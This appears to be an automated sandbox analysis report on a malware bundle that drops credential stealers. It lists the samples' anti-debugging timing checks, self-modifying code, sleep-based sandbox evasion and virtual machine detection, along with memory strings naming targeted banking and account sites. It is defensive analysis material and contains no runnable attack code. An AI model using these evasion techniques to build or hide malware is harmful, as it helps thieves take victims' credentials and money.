Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 3E0877 second address: 3E0885 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 3E0885 second address: 3E0889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 3E0889 second address: 3E0897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F99D0D12E16h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 3F9FF9 second address: 3F9FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BBEADF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D70C94 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BBC69A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D82AF4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DFAB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 26EADF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 420C94 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 26C69A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 432AF4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 4AAB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Special instruction interceptor: First address: D21B9F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Special instruction interceptor: First address: ECE6D1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Special instruction interceptor: First address: F60A79 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 15A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 3160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 3070000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 28A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2A90000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 29D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory allocated: 2820000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory allocated: 29B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory allocated: 49B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Memory allocated: 3120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Memory allocated: 31B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Memory allocated: 51B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Memory allocated: 1390000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Memory allocated: 2E90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Memory allocated: 2D70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory allocated: DF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory allocated: 28A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory allocated: 26B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2AF0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2C80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Memory allocated: B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Memory allocated: 23B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Memory allocated: 43B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 2600000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 2820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 4820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory allocated: 1320000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory allocated: 2D20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory allocated: 4D20000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 11A0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D20000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2AD0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05580C46 rdtsc 0_2_05580C46
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 443 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 401 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 414 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 445 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 401 Jump to behavior
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Window / User API: threadDelayed 819
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Window / User API: threadDelayed 488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 1796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 3333
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Window / User API: threadDelayed 2376
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Window / User API: threadDelayed 1892
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Microsoft-Edge[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\neon[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\NetSup_Buil2d.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000355001\3ab68b6f1f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000357001\Microsoft-Edge.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 9.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4904 Thread sleep count: 259 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4904 Thread sleep time: -518259s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1976 Thread sleep count: 443 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1976 Thread sleep time: -886443s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2724 Thread sleep count: 401 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2724 Thread sleep time: -802401s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3524 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4776 Thread sleep count: 161 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4776 Thread sleep time: -4830000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 616 Thread sleep count: 421 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 616 Thread sleep time: -842421s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1176 Thread sleep count: 414 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1176 Thread sleep time: -828414s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5632 Thread sleep count: 445 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5632 Thread sleep time: -890445s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2196 Thread sleep time: -1080000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5512 Thread sleep count: 401 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5512 Thread sleep time: -802401s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4776 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe TID: 5256 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1404 Thread sleep count: 288 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1404 Thread sleep count: 207 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe TID: 3080 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe TID: 3212 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe TID: 2912 Thread sleep count: 819 > 30
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe TID: 2912 Thread sleep count: 488 > 30
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe TID: 3840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe TID: 5040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe TID: 5692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 5760 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 5760 Thread sleep time: -312000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6288 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 2268 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 2168 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 1780 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 6516 Thread sleep count: 302 > 30
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 3264 Thread sleep count: 167 > 30
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe TID: 3544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3748 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe TID: 6064 Thread sleep count: 74 > 30
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe TID: 6064 Thread sleep time: -444000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041B6EA FindFirstFileExW, 15_2_0041B6EA
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData\Local\Temp
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp Binary or memory string: ParallelsVirtualMachine
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: needmoney.exe, 00000018.00000000.2908554438.0000000000401000.00000020.00000001.01000000.00000013.sdmp Binary or memory string: QEMUU
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: axplong.exe, 00000006.00000002.3518419435.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.000000000104F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe@\
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
